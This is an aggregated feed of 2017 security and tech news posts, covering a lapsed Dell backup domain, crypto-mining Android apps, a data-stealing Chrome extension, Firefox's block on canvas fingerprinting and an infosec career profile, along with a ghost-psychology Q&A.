Perhaps the biggest takeaway from the PSA is that fixing this sector is not going to be cheap, or quick.
It’s true that the reference architecture is open source but implementing it depends on additional layers such as certificate-based authentication which, presumably, ARM will be delighted to offer at a price.
Device makers, and their customers, have been warned – IoT can be fixed but only by radically reforming the chaotic business model that has powered its breakneck growth rates.
from Naked Security http://ift.tt/2yYzbGa
Google Log-In Security for High-Risk Users
Google Login Security for High-Risk Users
Google has a new login service for high-risk users. it's good, but unforgiving.
Logging in from a desktop will require a special USB key, while accessing your data from a mobile device will similarly require a Bluetooth dongle. All non-Google services and apps will be exiled from reaching into your Gmail or Google Drive. Google's malware scanners will use a more intensive process to quarantine and analyze incoming documents. And if you forget your password, or lose your hardware login keys, you'll have to jump through more hoops than ever to regain access, the better to foil any intruders who would abuse that process to circumvent all of Google's other safeguards.
It's called Advanced Protection.
Tags: Gmail, Google, malware, phishing, risks, scanners, security engineering, USB
Posted on October 30, 2017 at 12:23 PM • 0 Comments
from Schneier on Security http://ift.tt/2gN0XKI
Dell forgot to renew the domain it uses for PC backups
Once upon a time, there was a Dell domain called (deep breath…)
dellbackupandrecoverycloudstorage.com
(Loooooooooong name, isn’t it? Kind of asking for trouble a la Equifax and that silly domain name it came up with post-mega-breach, wouldn’t you say? But that’s another story.)
Its purpose is to serve as an information repository for Dell’s data protection products. Its other job is to be a home base for Dell’s Backup and Recovery application, which “enables the user to backup and restore their data with just a few clicks.”
As Dell customer liaison Jesse L described it on a Dell support forum, the basic version of that program is installed by default on Dell PCs:
The Basic version comes pre-installed on all systems and allows the user to create the system recovery media and take a backup of the factory installed applications and drivers. It also helps the user to restore the computer to the factory image in case of an OS issue.
In other words, if you have a problem on your system – say, all of your files have been wiped or encrypted by malware – you can use Backup and Recovery to restore it to a pristine state.
As you can see, this all means that whoever controls that mouthful of a domain name could exercise an awful lot of power over the data on Dell customers’ systems.
Fine, if that somebody is Dell, but what if it’s not?
What if the somebody who controlled the domain wasn’t offering an if-all-else-fails route back to a malware-free system but was actually looking to spread malware?
Unfortunately, that may be exactly what happened for about a month this year, from early June to early July 2017.
On Tuesday, security reporter Brian Krebs published a tale of how during that time, the domain slipped out of the hands of a Dell partner – SoftThinks.com, a software backup and imaging solutions provider in Texas.
Krebs explains:
From early June to early July 2017, DellBackupandRecoveryCloudStorage.com was the property of Dmitrii Vassilev of “TeamInternet.com,” a company listed in Germany that specializes in selling what appears to be typosquatting traffic. Team Internet also appears to be tied to a domain monetization business called ParkingCrew.
A typosquatter registers misspelled domain names (think faceboook or goggle) in the hope of fooling users who mistype them. Type in a domain like that and you might find it hosting ads for scam products, or worse, it might be inhabited by a website designed for phishing or hosting malware.
Regardless of whether TeamInternet was the primary malware shipper or not (it’s possible the site was inadvertently malvertising) the server that was running what should have been a Dell-controlled domain started showing up in malware alerts about two weeks after SoftThinks let it slip out of its grasp.
Dell confirmed it lost control of the domain to The Register. Here’s its statement:
[the domain] expired on June 1, 2017 and was subsequently purchased by a third party. The domain reference in the DBAR application was not updated, so DBAR continued to reach out to the domain after it expired. Dell was alerted of this error and it was addressed.
We do not believe that the Dell Backup and Recovery calls to the URL during the period in question resulted in the transfer of information to or from the site, including the transfer of malware to any user device.
Well, that’s a relief: malware might have been on the menu if you visited the domain with your web browser, but when your Dell Backup and Recovery application came calling it wasn’t.
What isn’t a relief: a major PC and data backup vendor – or what Dell calls the “Great Partner” it entrusts with its customers’ data – managed to #fail at something as easy as renewing a domain.
Of course, Dell isn’t alone in the walk of shame you have to take if your domain somehow slips from your grasp.
Earlier this month we brought you the story of a company that supplies a video relay service (VRS) – including emergency services – to deaf, hard of hearing and speech-disabled people. Forgetting to renew its domain meant a three-day outage for customers and a $3 million fine from the Federal Communications Commission (FCC).
Because really. Really. Failing to renew is hard.
Almost everyone wants you to renew – you want the domain and your registrar wants your money. Even if your domain expires it’s set aside for you and nobody else for what can amount to months of get-out-of-jail-free time as grace and redemption periods play out.
Still, it shouldn’t come to that. There are many ways to stay on top of your domain renewals – you could try to construct a memory palace, say, or perhaps you could get a tattoo, though you’d have to keep up with re-inking – but the easiest option is to hit autorenew when you register the name.
from Naked Security http://ift.tt/2xBgUKP
Cryptocurrency-mining script planted in apps on Google Play
Coinhive’s cryptocurrency-mining script has found its way into mobile apps offered on Google Play.
Trend Micro researchers have spotted two apps that have been equipped with it:
The first (prsolutions.rosariofacileads) is an app that is meant to help users pray the rosary, the second one (com.freemo.safetyne) allows users to “earn free Talk, Text, and Data” by racking up credits “by redeeming local coupons and deals, watching videos, taking surveys and more.”
“Both of these samples do the same thing once they are started: they will load the JavaScript library code from Coinhive and start mining with the attacker’s own site key,” the researchers explained.
“This JavaScript code runs within the app’s webview, but this is not visible to the user because the webview is set to run in invisible mode by default. When the malicious JavaScript code is running, the CPU usage will be exceptionally high.”
Is it worth it for the crooks?
Both of the apps have been pulled from Google Play, and the accounts of their developers have apparently been removed or suspended. They can still be downloaded from some third-party Android stores.
In addition to this, the researchers also unearthed a legitimate wallpaper app (com.yrchkor.newwallpaper) that has been modified to include a mining library.
“The efficacy of mobile devices to actually produce cryptocurrency in any meaningful amount is still doubtful,” the researchers noted, but pointed out that “the effects on users of affected devices are clear: increased device wear and tear, reduced battery life, comparably slower performance.”
They advised users to be on the lookout for covert crypto-mining apps and to uninstall apps that trigger a noticeable performance degradation on their devices.
from Help Net Security http://ift.tt/2hoLVf7
Why Do People See Ghosts?
You live and then you die and then you rot in a hole—or so say the elites, with their glasses, and their PhDs in neuroscience. This bummer reality has never appealed much to Americans, 72 percent of whom believe in some kind of afterlife. It’s a comparatively rarer, though still sizable, breed of American who believe in some spectral middle ground, in which, instead of rotting or going to hell, you float around and freak out your kids, or the new residents of the house where you were brutally murdered a hundred years ago.
According to Pew Research Center, close to one-fifth of Americans believe they’ve seen a ghost—a somewhat surprising statistic, given all the other ancient beliefs we’ve mostly jettisoned (bloodletting, for instance, has largely fallen out of vogue). For this week’s Giz Asks, we reached out to a number of psychologists and neuroscientists to figure out why this might be—and in the process learned that, given the number of ways our brain has of tricking us into seeing things, it’s a wonder that that statistic isn’t higher.
Christopher French
Founder of the Anomalistic Psychology Research Unit at Goldsmiths, University of London
Most of the time, when people think they’ve had a ghostly encounter, they haven’t necessarily actually seen something. Very often you’ll find that what people are referring to is a bit vaguer than that—a very strong sense of presence, for instance. Bereaved people might think that they smell the perfume that the deceased used to wear, or the tobacco they used to smoke.
People tend to assume, when you suggest that maybe they were hallucinating, that you’re saying that they’re crazy, and this just isn’t true—hallucinations are much more common amongst the non-clinical population than is generally appreciated. We can all hallucinate under appropriate conditions.
One of the phenomena that we’re particularly interested in is something called sleep paralysis. In its most basic form, sleep paralysis is very common. Estimates vary, but typically it’s estimated that about 8 percent of the general population suffer from basic sleep paralysis at least once in their lives, and a couple of groups—psychiatric patients and students—show it at a much higher rate.
What I mean by basic sleep paralysis is: You’re half awake and you’re half asleep—either going into sleep, or maybe coming out of it—and you get a period of temporary paralysis. It typically lasts a few seconds before you snap out of it. Most of the time it’s not a big deal—it’s a little bit disconcerting, that’s all.
For a smaller percentage of people, you get associated symptoms that can make for a much scarier experience—typically, a very strong sense of presence. Even if you can’t see or hear anything in the room with you, you get a very strong sense that there is something there. You might actually also hallucinate; you might hear voices, or footsteps, or mechanical sounds, or you might see dark shadows moving around the room, or lights, or monstrous figures, or shadow people. You might get tactile hallucinations—you might feel as if you’re being held, or you might feel someone breathing on back of your neck. And bear in mind that throughout all of this, you can’t actually move.
So it’s not too surprising that lots of people who have this experience, if they’ve never heard of sleep paralysis as a scientific and medical concept, end up reaching for some kind of supernatural interpretation. And because it’s such a common experience, you only need a small percentage of people who are having sleep paralysis to go for those kinds of supernatural interpretations.
Michael Nees
Assistant Professor, Department of Psychology, Human Factors, Perception and Cognition Lab, Lafayette College
Our phenomenological experiences of the world—the things we believe we see and hear—are actively constructed from limited and incomplete inputs from the physical world. The light that falls upon our eyes and the sound waves that reach our ears often could have resulted from multiple possible physical sources. For example, a vaguely humanoid object in the corner of a dark room could be a person or a ghost, but it could also just be a jacket hanging on a coat rack. To resolve these ambiguities, we actively construct an internal, mental version of the physical world that reflects our own biases and expectations. Sometimes our perceptions do not reflect accurate representations of the physical world. “Pareidolia” is the name for a common category of misperceptions that occur when a random (i.e., inherently meaningless) perceptual experience is interpreted to have meaning. A common version of pareidolia is perceiving human faces in random configurations of physical objects; a classic example is when people claim to see the face of Jesus in a piece of toast.
Some researchers have suggested that we may be biased toward perceiving ambiguous stimuli as human or human-like, because detecting other human beings in our presence has adaptive value—meaning that, from an evolutionary perspective, other people are especially important stimuli for us to notice. According to this argument, a false alarm (mistakenly perceiving a random, inanimate object—perhaps momentarily—as human) is less harmful than a miss (failing to notice another actual human in one’s presence), thus, when faced with uncertainty, our perceptual systems are calibrated to be more likely than not to register an object as human.
There is some research to indicate that people who are prone to paranormal beliefs are especially likely to attribute human characteristics to ambiguous stimuli, and researchers have suggested that a spooky context or the suggestion of a paranormal situation can prime people to be more likely to interpret ambiguous stimuli as ghosts or poltergeists.
Neil Dagnall and Keith Drinkwater
Neil Dagnall is Reader in Applied Cognitive Psychology at Manchester Metropolitan University, researching anomalous psychology and cognitive psychology; his lab is undertaking several projects centering on belief in the paranormal
Advertisement
Advertisement
Ken Drinkwater is Senior Lecturer at Manchester Metropolitan University who studies paranormal belief
The survival hypothesis proposes a disembodied consciousness (soul) survives bodily death. Seeing ghosts in this context confirms belief in life after death and produces reassurance.
Other explanations draw on environmental factors, such as electromagnetic fields and infrasound. Canadian neuroscientist Michael Persinger demonstrated that the application of varying electromagnetic fields to the temporal lobes of the brain could produce haunt-like experiences (perception of a presence, feeling of God, sensation of being touched, etc.).
Haunt-like perceptions can also arise from reactions to toxic substances. Albert Donnay (Toxicologist) hypotheses that prolonged exposure to a range of substances (carbon monoxide, formaldehyde, pesticide, etc.) can produce hallucinations consistent with haunting. Similarly, Shane Rogers (Associate Professor of Civil & Environmental Engineering) reported that fungal hallucinations caused by toxic mould could stimulate haunting-related perceptions.
Professor Olaf Blanke recently demonstrated that haunt-like illusions could arise from perceptual disorientation. Specifically, conflicting sensory-motor signals. Blindfolded participants performed hand movements in front of their body. A robot imitated the moments in real time by harmoniously touching the participants’ backs. The synchronized movement of the robot allowed participants to adapt to spatial discrepancy. However, temporal delay between participant’s movement and the robot’s touch produced disorientation accompanied by strong feeling of a presence.
Terence Hines
Professor of neurology at Pace University and the author of Pseudoscience and the Paranormal
The human brain has evolved to find patterns. If you’re in the wilderness, and you hear something behind you, it’s way better to think that it’s really a lion or a sabertooth tiger sneaking up on you—to attribute that sound to some agency, something that has purpose. Because if it does have purpose, and you run away, you’re better off. And if it’s just random noise and you run away, there’s no foul, it doesn’t really cost you anything. So we’ve evolved to experience what neuroscientist types call false positives. It’s better to be safe than sorry.
[Another explanation] involves expectations, and there a couple of lovely demonstrations of this effect. Some years ago, for a term project, one of my students took some people to a local graveyard. In one condition, people were taken to a particular grave and told, this is the grave of some old guy who died at 72 of natural causes. Nothing weird about it. This is late at night, midnight. And they would ask: what do you feel? Are you getting any sensations? And people said well, no, not really. And then in the other condition they took people to the same grave at about the same time, late at night, and said it was the grave of a teen girl who died tragically—she’d killed herself after her boyfriend left her, and she’s said to haunt this grave at midnight on the night in question, and this is the anniversary of her suicide. People freaked out. They saw her, they heard her—and it was all due to expectations. I’m not saying that the folks who experienced the ghost of this non-existent teenage girl were lying, or crazy, or hysterical—they weren’t. Their brain was just doing what brains do; they were using information they were given, which turned out to be incorrect.
Tapani Riekki
Cognitive neuroscientist, Department of Psychology and Logopedics, Faculty of Medicine, University of Helsinki
The key thing seems to be interpretation. We know from various studies that our information processing is not “bottom-up”—we don’t just see/hear/feel our environments. Instead, our perception of reality is a complex interplay between bottom-up and top-down processes. Top-down processes refer to the expectations, beliefs, and context that shape our perceptions and influence our interpretations. Even the basic bottom-up processes are not exact copies of reality but approximations shaped by context. How we experience our surroundings is a complex simulation of our mind that leaves a lot of space for interpretation and quirks.
Frank McAndrew
Cornelia H. Dudley Professor of Psychology at Knox College and an elected Fellow of the Association for Psychological Science
Seeing ghosts may be triggered by the “agency-detection mechanisms” proposed by evolutionary psychologists.
These mechanisms evolved to protect us from harm at the hands of predators and enemies. If you are walking down a dark city street and hear the sound of something moving in a dark alley, you will respond with a heightened level of arousal and sharply focused attention and behave as if there is a willful “agent” present who is about to do you harm. If it turns out to be just a gust of wind or a stray cat, you lose little by overreacting, but if you fail to activate the alarm response and a true threat is present, the cost of your miscalculation could be high. Thus, we evolved to err on the side of detecting threats in such ambiguous situations.
In other words, if an individual believes that an encounter with a ghost is a possibility, then ghosts may become the explanation that gets used to resolve uncertainty.
A recent study by Kirsten Barnes & Nicholas Gibson (2013) explored the differences between individuals who have never had a paranormal experience and those who have. They confirmed that experiences of supernatural phenomena are most likely to occur in threatening or ambiguous environments, and they also found that those who had paranormal experiences scored higher on scales measuring empathy and a tendency to become deeply absorbed in one’s own subjective experience.
Benjamin Radford
Benjamin Radford, M.Ed., is a Research Fellow with the Committee for Skeptical Inquiry, a non-profit educational organization based in Buffalo. He has researched ghostly and “unexplained” phenomenon for nearly 20 years and is author of several books on the topic, including “Investigating Ghosts,” out this fall.
When researching ghostly phenomena one of the first things you realize is that often “ghost” is simply a convenient (if sloppy) label for “an experience someone doesn’t understand.” Reports of full-bodied apparitions (the kind you might see at Disneyland’s Haunted Mansion, for example) are very rare. Instead you find that many “ghostly” experiences are much more ambiguous: odd smells or sounds, a feeling of being watched, temperature variations, animals acting up, and so on. Even such mundane experiences as losing your keys can be—and have been—chalked up to the doings of a mischievous resident spirit.
Because there’s such a wide variety of experiences attributed to spirits, there’s no single blanket explanation for all ghost reports. Some can be caused by mild hallucinations—I’m not talking about over-the-top, full-on wild LSD-type hallucinations of flying pink elephants, but instead much more common and subtle tricks of the eye and mind, especially that might occur late at night. The human brain is wonderful but also fallible, and we don’t always perceive and interpret the world around us correctly—and because many “ghostly” experiences are small and fleeting (not the huge and obvious kind depicted in horror films), it’s easy to wonder if an odd sound or light is mysterious. This leads to the second common factor as to why people believe they’re experiencing ghosts: usually they’re influenced by pop culture ideas about what ghosts are and how they act. People watch TV shows like Ghost Hunters (now past its tenth season of not finding ghosts) and are influenced by those shows in terms of what psychologists call priming. Our expectations often guide our perceptions and interpretations, and thus we often see or hear what we expect to see—sometimes even if it’s not there. The psychological reasons behind why people claim to (or believe that they see) ghosts is well understood—and that’s true whether ghosts exist or not!
Do you have a question for Giz Asks? Email us at tipbox@gizmodo.com.
from Lifehacker http://ift.tt/2yY7qL8
Deadspin Game 5 Was Murder On Baseballs And Superlatives | Jezebel Kevin Spacey Dodges Allegations o
Deadspin Game 5 Was Murder On Baseballs And Superlatives | Jezebel Kevin Spacey Dodges Allegations of Sexual Advances Toward a Minor By Coming Out | Splinter ‘White Lives Matter’ Mob Attacks Interracial Couple After Tennessee Rally | Earther Is Antarctica’s Scarred Seafloor a Harbinger of Trouble to Come? | The Root Motorist Dead after 12-Year-Old Boy Attempting Suicide Jumped Off Overpass and Landed On Her Car |
from Lifehacker http://ift.tt/2yemAPD
Firefox will soon block canvas-based browser fingerprinting attempts
Starting with Firefox 58, users will be able to refuse websites’ requests for information extracted via the HTML5 canvas element, which can be used to fingerprint their browsers.
What is browser fingerprinting?
Browser fingerprinting is used as an alternative to browser cookies by websites and web analytics services that want to identify users and track their online behavior.
There are a number of browser/device fingerprinting techniques, but Mozilla aims to address the issue of “canvas fingerprinting,” which works by exploiting the browser’s HTML5 canvas element.
The technique works like this: a user visits a website that sends a request to his browser to render hidden text or graphic on a hidden canvas element. The result is extracted, and a hash of it becomes the fingerprint of the browser.
This fingerprint is shared among advertising partners, and used to detect when that user visits affiliated websites. In this way, a profile of the user’s browsing habits can be created, and used to target advertising.
Canvas fingerprinting works because each browser and the system on which it is installed has a specific hardware and software configuration, meaning that the fulfilment of the site’s request will result in different renders and, therefore, different and possibly unique fingerprints.
Some browser fingerprinting attempts can be prevented by using add-ons like Privacy Badger or DoNotTrackMe in conjunction with ad blocking lists.
Firefox changes
With the change, which will require sites to prompt users for permission before they can extract canvas data, Firefox will become the first of the major browsers to do something about this ubiquitous online tracking technique.
This new feature comes over four years after the Tor Browser implemented an option of letting users prevent canvas fingerprinting, and is the result of an ongoing effort to implement all Tor Browser privacy and security patches into Firefox. (Tor Browser is based on Mozilla Firefox ESR.)
Mozilla has a history of trying to prevent online user tracking. With Firefox 52, it stopped allowing websites to access the Battery Status API and the information it can provide about the visitor’s device, as well as implemented protection against system font fingerprinting.
Firefox 58 is due for release in January 2018, and another change set to take place with it is the removal of WoSign and StartCom root certificates from Mozilla’s root store.
A discussion has also been recently started on whether Firefox should continue trusting certificates signed by the Staat der Nederlanden Root CA – the Dutch national CA – in wake of a new law that would allow intelligence and security to intercept internet traffic, and to use “‘false keys’ in third party systems to obtain access to systems and data.”
from Help Net Security http://ift.tt/2yYrPjq
Hacking site hacked by hackers
We try not to guffaw at cybercrime, but sometimes – especially on a Monday just after the clocks have gone back to remind us that summer is very much over – we allow ourselves a wry smile.
As we did today on reading a report from our chums at Bleeping Computer in which a cybercrook turned on his fellow crooks by hacking their underground forum and saying he would expose them to the cops…
…unless they forked over $50,000:
MESSAGE TO BASETOOLS OWNER: Hello, you have only 24 hours to pay 50.000$ OTHERWISE YOU WILL BE EXPOSED AROUND THE WORLD & ALSO WE HAVE TOO MANY PROOFS THAT WE HAVEN'T INCLUDED THEM HERE AND THOSE WE WILL SENT TO THE RELEVANT BODIES
The ebullient extortionist listed four examples of “relevant bodies”, all of them in the US: Homeland Security, the Treasury, the Department of Justice and, for good measure, the FBI. (We couldn’t help think that the Internal Revenue Service might be interested, too.)
According to Bleeping Computer, the crook uploaded some of his “proofs” to the Basetools hacking site itself, presumably to cause maximum embarrassment amongst the site’s criminal community.
These published “proofs” included a screenshot that’s supposed to show the web administration panel of the Basetools forum, listing the pseudonyms of the last 15 buyers and sellers, as well as the last 9 refunds.
Seems that the crooks have problems trusting each other on many different levels.
To pay or not to pay?
We don’t want to be seen as offering advice to cybercriminals, but we’d strongly urge against paying up in extortion cases like this.
It’s clear that the data has already been stolen – and some of it already shared with the world, let alone with US law enforcement – so paying now won’t do much good.
In ransomware demands, the extortion typically covers a decryption key for data that almost certainly wasn’t copied by the crooks – in other words, if you decide you aren’t going to pay up, the crooks have nothing further to squeeze you with.
But when the crooks already have copies of your data, and are threatening to besmirch, embarrass or defraud you by exposing it, paying the fee won’t do anything to stop them besmirching you anyway.
Or coming back for more money next week.
For what it’s worth, it seems that the Basetools site owners haven’t quite figured out what to do yet – at the time of writing [2017-10-30T12:00Z], their underground forum said:
One thing they definitely haven’t done yet is to read our highly educational article What you sound like after a data breach.
What to do?
Hackers hacking hackers sounds funny, and perhaps it is – but if hackers can be hacked, then so can you, if you aren’t careful.
We don’t know how this attack happened, but the obvious precautions you can take for your own online service include:
- Patch promptly. If the crooks know what server software version you are using, and it has a known security hole, they may very well be able to break in automatically. In other words, if you haven’t patched, you’re the low-hanging fruit.
- Choose decent passwords. If the crooks can guess your password, or if you used the same password on another site that already got hacked, then the crooks don’t need to do any hacking themselves – they can just login directly.
- Use two-factor authentication (2FA). A one-time code that changes every time you login means that just guessing or stealing your password isn’t enough. If the code is calculated on or sent to your phone, then the crooks need your phone (and its unlock code) as well, which is a higher bar to jump over.
- Check your logs. If you keep logfiles for auditing purposes, for example so you can check who logged in when, examine them proactively in order to find out about security anomalies sooner rather than later.
Honour amongst thieves, eh?
from Naked Security http://ift.tt/2hmWkrF
Monday review – the hot 17 stories of the week
Get yourself up to date with everything we’ve written in the last seven days – it’s weekly roundup time.
Monday 23 October 2017
On Monday Paul Ducklin took to Facebook Live and explained the DDE email attack.
(Can’t see the video directly above this line? Watch on Facebook instead.)
(You don’t need a Facebook account to watch the video, and if you do have an account you don’t need to be logged in. If you can’t hear the sound, try clicking on the speaker icon in the bottom right corner of the video player to unmute.)
Tuesday 24 October 2017
Wednesday 25 October 2017
Thursday 26 October 2017
Friday 27 October 2017
Would you like to keep up with all the stories we write? Why not sign up for our daily newsletter to make sure you don’t miss anything. You can easily unsubscribe if you decide you no longer want it.
Follow @NakedSecurityImage of days of week courtesy of Shutterstock.
from Naked Security http://ift.tt/2z2zeA4
Malicious Chrome extension steals all data
There’s a glut of malicious Google Chrome extensions out there, but some are more harmful than others. The one that SANS ISC incident handler Renato Marinho has dubbed “Catch-All” falls in the former category.
A data-stealing Chrome extension
Marinho spotted the extension being pushed onto users via a phishing e-mail with links to photos supposedly sent through WhatsApp. But, instead of the photos, the victims would download a malware dropper file called “whatsapp.exe”.
Once executed, the executable would present a fake Adobe PDF Reader install screen, and if the victim chose the “Install” option, they triggered the download of a .cab file carrying two executables: md0.exe and md1.exe.
Before the malicious extension is installed, the md0 executable tries to disable Windows Firewall, kill all Google Chrome processes, and disable several security features that could prevent the malicious extension from working as intended (such as disabling improved SafeBrowsing download protection).
Once all this is achieved, it extracts the Catch-All extension and changes Google Chrome launcher (“.lnk”) files to load it on the next execution.
Finally, the extension springs into action: it captures data posted by the victim on websites, and sends it to a C&C server using jQuery ajax connections:
The threat
Some extensions’ main purpose is to inject ads and spam users. Others’ is to push tech support scams or malware, or steal online banking credentials.
“Catch-All” goes after every piece of data the victim posts on any website, including login credentials for all kinds of online services.
As Marinho pointed out, this allows crooks to capture highly sensitive data with minimal effort.
“It wasn’t necessary for the attacker to attract the victim to a fake website with doubtful SSL certificates or deploying local proxies to intercept web connections. Quite the opposite, the user is accessing original and legitimate websites and all the interactions are working properly while data is captured and leaked. In other words, this method may subvert many security layers the victim may have in place,” he noted.
from Help Net Security http://ift.tt/2z3VnOH
Chris Eng: An infosec journey from offense to defense
“Come to my lab, I promise you’ll learn something cool,” a friend told Chris Eng. Within a couple of hours, he had walked him through writing an exploit for an obscure Linux bug, and Eng was hooked on the idea that one could leverage a programming error to gain root privileges on the system.
Chris Eng, photo by Brendan Stewart
He spent the next year or so learning more about finding and exploiting software vulnerabilities and then left the NSA to join a startup called @stake.
“That was probably the first time I realized information security could be a lucrative career path, not just an intellectual pursuit,” he told me.
Currently the Vice President of Research at Veracode, Eng started his computer education at a pretty young age. He taught himself to program BASIC on a TI-99/4A and, somehow, that progressed into an interest in understanding how systems worked and how they were vulnerable.
“Like many in our field, I was constantly hunting for information on BBSes in the form of text files: how to crack copy protection on computer games, how the phone system worked, and so on. But I never really saw any of this as a career direction,” he says.
At the time, information security barely existed. In fact, most people didn’t even have Internet access. So he chose to major in electrical engineering and computer science, anticipating that he would be working in microprocessor design or similar hardware pursuits. In the end, that didn’t happen.
Infosec beginnings
His six years with @stake – including two years after the Symantec acquisition – heavily shaped how he views information security and software in general.
He spent the majority of his time on short, offense-focused projects. “I already knew network security was a mess, but the ease of breaking into one website after another helped me see how brittle and insecure software was, even at the largest, best resourced companies. Very few developers had received any training or guidance on how to write code securely, and their findings were often met with incredulity, even denial,” he recounts.
Among the many important lessons he learned while at @stake were that penetration testing will never scale with the pace of software development, and that understanding how to attack systems is a crucial element in understanding how to defend them.
By later joining Veracode, he seized the opportunity to spend some time on defense after many years on offense, and to try and address the software security problem in a completely new way, with a founding team that he liked and respected.
“Plus, I was excited to join at such an early stage (employee #15) where I knew my efforts would have significant impact and I could be influential. At Veracode, we’re unquestionably making it harder for attackers by finding software vulnerabilities early and helping developers fix them. Even though I’m not interacting directly with customers as much as I used to, my team builds those capabilities, and I’m proud to be having an impact.”
A decade in infosec
A lot of things have changed for te better since he started working in the infosec field.
“On the whole, we still fetishize 0-day vulnerabilities to an extreme I feel is unhealthy, but I’ve started to see more emphasis and respect with regard to defensive work, which is a positive trend,” Eng says.
Other positive trends he pointed out are more attention paid to automation, companies handling vulnerability disclosures in a more structured and less adversarial manner, and more companies proactively baking security testing and other security activities into their development processes.
Also, CISOs are finally able to communicate the value of information security (and improvements to it) to the board level audience. In the past, they would never even interact with the board unless there was a data breach.
He is more undecided about the changes tied to cybersecurity reporting. There’s now doubt that it is reaching a wider audience than ever before, but this is a double-edged sword: public awareness is up, but there is also more misinformation and FUD.
“The media gravitates toward people who speak in sound bites, regardless of their real-world experience. Even scarier, policy makers do too. Like most of the tech industry, we have a ‘thought leadership’ problem. We hear way too often from the same people, he noted.”
Changes he would like to see
He finds that people buy too much into the hype around detecting zero day attacks, yet many are not even doing basic hygiene such as patch management.
Organizations should also do make sure they have an accurate view of their application perimeter, by keeping track of websites and other services that may have access to sensitive information.
The information security industry should aim to stop fixating on failure, characterizing developers as stupid, blaming victims, perpetuating dogma and glamorizing extreme paranoia, and start paying more attention to how it is perceived and finding ways to collaborate more effectively and reasonably with the people it’s trying to reach.
Another of Eng’s goals is to do everything he can to make the industry more welcoming to women and other underrepresented groups. “There is systemic misogyny in both tech and information security, and we need more people to acknowledge this and call out bad behavior,” he says.
Lessons learned
Of the most important lessons he’s learned over the years, none are technical:
“Having good security is not a motivation to the general public. People remember how you interact with them and whether you keep your word. Build relationships. Even the best ideas will never take off unless you can communicate well. Management is about developing people. Assume competence, at least until you’re disproven. Pick your battles.”
His advice to newcomers to the infosec industry is to network like crazy.
“Your best job opportunities will come to you through your professional network, not by submitting your resume blindly to job sites,” he says.
By that, he doesn’t mean “add as many people as you can on LinkedIn”, but connecting with them at conferences, meetups, on Twitter.
“These days, there are so many ways to connect with like-minded people. Take advantage of that, but at the same time, don’t expect to be spoon fed. Take some initiative, and demonstrate the ability to learn things on your own. There are online tutorials for just about every security topic imaginable – I wish information had been this easy to come by when I was getting into security. Be genuine and humble.”
Those who want to wade into security research should have a healthy dose of curiosity, the ability to self-teach, the willingness to take risks and occasionally fail, communication skills, and aptitude and experience to contextualize risk rather than fear-mongering.
“I personally believe humility is extremely important as well, maybe the most important – granted, arrogance won’t prevent you from finding bugs, but who wouldn’t rather work with people who are humble and kind?” he concludes.
from Help Net Security http://ift.tt/2hnQkiz